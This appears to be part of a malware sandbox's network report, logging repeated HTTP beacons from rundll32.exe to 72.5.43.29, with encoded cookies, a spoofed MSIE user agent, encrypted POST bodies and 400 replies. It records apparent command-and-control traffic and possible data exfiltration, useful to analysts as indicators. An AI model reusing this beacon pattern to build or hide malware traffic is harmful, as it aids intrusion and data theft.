Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:33.979973078 CEST153INHTTP/1.1 200 OK
Date: Thu, 15 Aug 2024 03:29:33 GMT
Content-Length: 32
Content-Type: text/html; charset=ISO-8859-1
Data Raw: af a5 39 e1 ae 05 69 ab b7 56 35 f4 66 c1 a6 e0 78 26 73 32 9b 6e b3 1b e5 a1 a7 e7 9e f5 36 22
Data Ascii: 9iV5fx&s2n6"
Aug 15, 2024 05:29:34.005033016 CEST535OUTPOST / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: e4 31 93 8b 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 7b 26 73 32 9b 6e b3 1b ca a1 a7 e7 8f f5 36 22 5c fb 00 56 f2 3e 8d e0 c3 17 d9 5f dd d0 cb b4 1d a7 cc 3f b9 11 97 de 94 d1 ff 36 27 f0 9c 8f 9c 10 ec 74 6a a4 13 e9 c8 ec c6 61 56 e6 b7 2d b2 fe f8 7b 4b cc 17 0e bf 72 29 50 98 a5 bd 77 17 f3 25 e2 91 1f a5 c7 67 c5 ed fe 1f f0 bb 15 eb 2a be 50 73 b1 6c 66
Data Ascii: 1>Rd{&s2n6"\V>_?6'tjaV-{Kr)Pw%g*Pslf
Aug 15, 2024 05:29:34.220612049 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:34 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.44973172.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:29:34.245693922 CEST415OUTPOST / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Content-Length: 776
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:34.245729923 CEST776OUTData Raw: d2 37 f8 30 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 79 26 73 32 9b 6e b3 1b c6 a1 a7 e7 79 f7 36 22 52 82 31 37 a6 66 cc 87 71 62 94 2a dd c0 e5 aa 1a 85 ee 3f b8 11 c8 9a a4 f6 c4 46 52 bd d8 ca f2 3b f4 38 64 a4 5d b0 fc d2 d5 75 5e 87 cc 13 89 f5
Data Ascii: 70>Rdy&s2ny6"R17fqb*?FR;8d]u^BEECt5"PVf/PNA'~1kolX|f6[g\CO&w`,U<Q-Di#OTaDF(|YE0t[keH'Gt?
Aug 15, 2024 05:29:34.934056044 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:34 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.44973472.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:29:40.267796040 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:40.952701092 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:40 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.44973972.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:29:44.115083933 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:44.861294031 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:44 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.44974072.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:29:51.927395105 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:52.612926960 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:52 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
5192.168.2.44974172.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:29:59.237814903 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:29:59.983433962 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:29:59 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
6192.168.2.44974272.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:05.784789085 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:06.497452021 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:06 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
7192.168.2.44974372.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:11.127800941 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:11.870028973 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:11 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
8192.168.2.44974472.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:17.878631115 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:18.681452036 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:18 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
9192.168.2.44974672.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:22.332113028 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:23.027292967 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:22 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
10192.168.2.44974772.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:27.348251104 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:28.034893036 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:27 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
11192.168.2.44974872.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:35.004123926 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:35.739840984 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:35 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
12192.168.2.44974972.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:42.552580118 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:43.317878962 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:43 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
13192.168.2.44975072.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:47.270389080 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:47.982248068 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:47 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
14192.168.2.44975172.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:53.365479946 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:54.186480045 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:54 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
15192.168.2.44975272.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:30:57.660660028 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:30:58.502275944 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:30:58 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
16192.168.2.44975372.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:31:03.692082882 CEST393OUTGET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:04.396198988 CEST223INHTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:04 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


